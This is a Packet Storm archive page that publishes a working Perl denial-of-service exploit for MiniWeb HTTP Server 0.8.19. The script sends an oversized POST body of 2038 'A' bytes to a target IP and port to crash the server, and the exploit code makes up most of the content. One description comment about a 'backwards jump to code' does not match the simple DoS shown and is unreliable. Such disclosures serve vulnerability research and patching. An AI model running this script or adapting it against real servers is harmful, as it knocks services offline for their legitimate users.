what you don't know can hurt you
Home Files News &[SERVICES_TAB]About Contact Add New

MiniWeb HTTP Server 0.8.19 Denial Of Service

MiniWeb HTTP Server 0.8.19 Denial Of Service
Posted Jan 24, 2024
Authored by Fernando Mengali

MiniWeb HTTP Server version 0.8.19 remote denial of service exploit.

tags | exploit, remote, web, denial of service
SHA-256 | 806cf14b7bfbe59afa0635741b17030d35d81c1c23dfffe46710ae798f71c671

MiniWeb HTTP Server 0.8.19 Denial Of Service

Change Mirror Download
#!/usr/bin/perl

use IO::Socket;

# Exploit Title: MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS)
# Discovery by: Fernando Mengali
# Discovery Date: 24 january 2024
# Vendor Homepage: N/A
# Download to demo: https://drive.google.com/file/d/1935vpOZJPFJqnwTMPdkXTvoblA1SzBEK/view?usp=sharing
# Notification vendor: No reported
# Tested Version: MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS)
# Tested on: Window XP Professional - Service Pack 2 and 3 - English
# Vulnerability Type: Denied of Service (DoS)
# VĂ­deo: https://www.youtube.com/watch?v=2yVPUO-rl1E

#1. Description

#His technique works fine against Windows XP Professional Service Pack 2 and 3 (English).
#For this exploit I have tried several strategies to increase reliability and performance:
#Backwards jump to code a known distance from the stack pointer.
#The web server does not correctly handle the amount of data or bytes sent to server.
#When authenticating to the web server with a large number of characters for the server to process, the server will crash as soon as it is received and processed, causing Denied of service conditions.
#Successful exploitation of these issues allows remote attackers to crash the affected server, denying service to legitimate users.

#2. Proof of Concept - PoC

$sis="$^O";

if ($sis eq "windows"){
$cmd="cls";
} else {
$cmd="clear";
}

system("$cmd");

intro();
main();

print "[+] Exploiting... \n";

my $payload = "\x41" x 2038;

my $http_req = "POST /index.html HTTP/1.1\r\n";
$http_req .= "Host: $ip\r\n";
$http_req .= "From: header-data\r\n";
$http_req .= "Content-Type: application/x-www-form-urlencoded\r\n\r\n";
$http_req .= $payload;

my $socket = IO::Socket::INET->new(
PeerAddr => $host,
PeerPort => $port,
Proto => 'tcp'
) or die "[-] Could not connect\n";

$socket->send($http_req);
$socket->close();

print "[+] Done - Exploited success!!!!!\n\n";

sub intro {
print q {


_/|
// o\
|| ._)
//__\
)___(

[+] MiniWeb HTTP Server 0.8.19 - Denied of Service (DoS)

[*] Coded by Fernando Mengali

[@] e-mail: fernando.mengalli@gmail.com

}
}

sub main {

our ($ip, $port) = @ARGV;

unless (defined($ip) && defined($port)) {

print " \nUsage: $0 <ip> <port> \n";
exit(-1);

}
}
Login or Register to add favorites

File Archive:

July 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Jul 1st
    27 Files
  • 2
    Jul 2nd
    10 Files
  • 3
    Jul 3rd
    35 Files
  • 4
    Jul 4th
    27 Files
  • 5
    Jul 5th
    18 Files
  • 6
    Jul 6th
    0 Files
  • 7
    Jul 7th
    0 Files
  • 8
    Jul 8th
    28 Files
  • 9
    Jul 9th
    44 Files
  • 10
    Jul 10th
    24 Files
  • 11
    Jul 11th
    25 Files
  • 12
    Jul 12th
    11 Files
  • 13
    Jul 13th
    0 Files
  • 14
    Jul 14th
    0 Files
  • 15
    Jul 15th
    0 Files
  • 16
    Jul 16th
    0 Files
  • 17
    Jul 17th
    0 Files
  • 18
    Jul 18th
    0 Files
  • 19
    Jul 19th
    0 Files
  • 20
    Jul 20th
    0 Files
  • 21
    Jul 21st
    0 Files
  • 22
    Jul 22nd
    0 Files
  • 23
    Jul 23rd
    0 Files
  • 24
    Jul 24th
    0 Files
  • 25
    Jul 25th
    0 Files
  • 26
    Jul 26th
    0 Files
  • 27
    Jul 27th
    0 Files
  • 28
    Jul 28th
    0 Files
  • 29
    Jul 29th
    0 Files
  • 30
    Jul 30th
    0 Files
  • 31
    Jul 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2022 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close